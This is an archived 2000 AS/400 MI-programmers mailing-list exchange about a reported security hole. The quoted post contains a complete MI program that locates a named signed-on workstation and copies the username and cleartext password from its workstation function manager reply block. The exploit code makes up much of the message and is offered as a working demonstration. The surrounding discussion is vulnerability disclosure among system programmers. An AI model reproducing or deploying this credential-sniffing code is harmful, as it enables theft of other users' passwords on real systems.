RE: New security holes? Was: Re: FW: paradox ? -- MI400

Is the workstation function manager reply block a global or by-job?

How is the SID set for ?work?  I was expecting to see some initialization
for it.  In my experience, you could see some interesting results if the
main storage where ?work ends up already contains a pointer but I never
worked with machine space pointers.

Richard Jackson
mailto:richardjackson@richardjackson.net
www.richardjacksonltd.com
Voice: 1 (303) 808-8058
Fax:   1 (303) 663-4325

-----Original Message-----
From: owner-mi400@midrange.com [mailto:owner-mi400@midrange.com]On
Behalf Of Gene_Gaunt/ReviewWorks@reviewworks.com
Sent: Tuesday, July 18, 2000 7:12 AM
To: MI400@midrange.com
Subject: Re: New security holes? Was: Re: FW: paradox ?


'Son of Sniff', shall we say, displays the cleartext password from the
suspended 'WS FM RB' of the signed-on workstation named in the external
parameter.  Last month's PTF SF62895 was a seperate issue in the ODP.  The
'WS FM RB' contains the raw 5250 Read MDT Fields input buffer where each
field is preceded by X'11' and hex row and column numbers.  For example if
sign-on screen's password input field is in default column 53, the RPGLE
DSPLY operation shows the cleartext password in reverse-image underline
turquoise (X'35').  Here is an MI version, minus the RPGLE DSPLY operation.

DCL SPCPTR ?DEVICE   PARM;
DCL SPCPTR ?USERPASS PARM;
DCL OL     MAIN      (?DEVICE, ?USERPASS) EXT PARM MIN(2);
DCL DD     DEVICE    BAS(?DEVICE) CHAR(10);
DCL DD     USERPASS  BAS(?USERPASS) CHAR(26);
DCL SPCPTR ?TABLE    BASPCO POS(225);
DCL MSPPTR ?WORK;
DCL DD     FORWARD   BAS(?WORK) POS(1) BIN(4);
DCL DD     NAME      BAS(?WORK) POS(7) CHAR(10);
DCL SPCPTR ?ODP      BAS(?WORK) POS(129);
DCL SYSPTR ?REQUEST  BAS(?WORK) POS(97);
DCL SPCPTR ?BUFFER   BAS(?WORK) POS(65);
DCL DD     BUFFER    BAS(?BUFFER) POS(7) CHAR(26);

    ENTRY      * (MAIN) EXT;           -- start here
    CPYBREP    USERPASS, " ";          -- clear previous stuff
    CPYBWP     ?WORK, ?TABLE;          -- point to device table
    SETSPPO    ?WORK, 128;             -- point to first entry
AA: CMPBLA(B)  NAME, DEVICE / EQ(BB);  -- exit loop if found
    CMPNV(B)   FORWARD, 0 / EQ(CC);    -- exit loop if end of chain
    SETSPPO    ?WORK, FORWARD;         -- point to next entry
    B          AA;                     -- repeat until found
BB: CMPPTRT(B) ?ODP, * / EQ(CC);       -- jump if not signed on
    CPYBWP     ?WORK, ?ODP;            -- point to open data path
    SETSPPFP   ?WORK, ?REQUEST;        -- point to 'WS FM RB'
    CPYBLA     USERPASS, BUFFER;       -- copy username & password
CC: PEND;                              -- return to caller


+---
| This is the MI Programmers Mailing List!
| To submit a new message, send your mail to MI400@midrange.com.
| To subscribe to this list send email to MI400-SUB@midrange.com.
| To unsubscribe from this list send email to MI400-UNSUB@midrange.com.
| Questions should be directed to the list owner/operator: dr2@cssas400.com
+---

+---
| This is the MI Programmers Mailing List!
| To submit a new message, send your mail to MI400@midrange.com.
| To subscribe to this list send email to MI400-SUB@midrange.com.
| To unsubscribe from this list send email to MI400-UNSUB@midrange.com.
| Questions should be directed to the list owner/operator: dr2@cssas400.com
+---